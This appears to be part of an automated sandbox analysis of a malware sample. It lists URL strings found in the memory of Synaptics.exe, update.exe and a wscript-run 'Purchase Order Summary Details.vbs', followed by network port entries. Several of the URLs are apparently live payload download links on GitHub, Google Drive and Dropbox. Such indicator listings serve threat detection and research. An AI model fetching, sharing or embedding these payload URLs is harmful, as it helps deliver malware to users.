                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtD
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtI
                                Source: Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt_
                                Source: Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtacomJ
                                Source: Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni/K
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleniDH%p.P
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu5
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu?
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduA
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaducati
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduluna
                                Source: Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurce.5
                                Source: Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduserc
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu~
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000752C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv4rY
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvE
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvI
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvd
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadving
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvt1.#
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw?
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwAFs)
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadws
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwt
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx:
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxF
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxG
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxH
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxK
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxeTre
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                                Source: Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady:
                                Source: Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyD
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyY
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyn
                                Source: Synaptics.exe, 00000010.00000002.2302187436.000000001D7C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor...
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzg
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~H
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~_R
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~f
                                Source: update.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                                Source: update.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~DF16C6BEDBEDB6C577.TMP.18.dr, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                                Source: Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                                Source: Synaptics.exe, 00000010.00000002.2299504453.000000001D6AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.us
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DA0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/:U
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/LU
                                Source: Synaptics.exe, 00000010.00000002.2223139983.000000000752C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2302736107.000000001D864000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2302187436.000000001D7B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2221900650.0000000007443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                                Source: Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXcOy
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXcOy1Us
                                Source: Synaptics.exe, 00000010.00000002.2299504453.000000001D6AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                                Source: Synaptics.exe, 00000010.00000002.2299504453.000000001D6AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcI
                                Source: Synaptics.exe, 00000010.00000002.2299504453.000000001D6AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcUDUv
                                Source: Synaptics.exe, 00000010.00000002.2299504453.000000001D6AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcjGDw
                                Source: Synaptics.exe, 00000010.00000002.2299504453.000000001D6AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetlen
                                Source: Synaptics.exe, 00000010.00000002.2221900650.0000000007443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjJf:
                                Source: wscript.exe, 00000000.00000003.1311634064.00000194116A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312583846.00000194116A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comMicrosoft
                                Source: wscript.exe, 00000000.00000002.1312382254.000001940EFC9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310308003.000001940EFC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310253929.000001940EFA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/
                                Source: wscript.exe, 00000000.00000002.1312382254.000001940EFC9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310308003.000001940EFC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310253929.000001940EFA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/)
                                Source: wscript.exe, 00000000.00000003.1311634064.00000194116B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312583846.00000194116B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/X
                                Source: wscript.exe, wscript.exe, 00000000.00000002.1312536779.00000194110E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312928343.0000019411EC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312434862.000001940F275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main
                                Source: wscript.exe, 00000000.00000002.1312291489.000001940EFA3000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Summary Details.vbsString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exe
                                Source: wscript.exe, 00000000.00000003.1310699131.000001940EF41000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312257308.000001940EF43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310598692.000001940EF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exe/
                                Source: wscript.exe, 00000000.00000003.1311634064.00000194116A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312583846.00000194116A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exeMz
                                Source: wscript.exe, 00000000.00000003.1311634064.00000194116A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312583846.00000194116A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exelz
                                Source: wscript.exe, 00000000.00000002.1312554054.0000019411690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exepK
                                Source: wscript.exe, 00000000.00000003.1310699131.000001940EF41000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312257308.000001940EF43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310598692.000001940EF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exeup
                                Source: wscript.exe, 00000000.00000003.1311634064.00000194116A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312583846.00000194116A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exeyz
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                                Source: Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                                Source: update.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=D
                                Source: update.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                                Source: Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~DF16C6BEDBEDB6C577.TMP.18.dr, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                                Source: Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50184
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
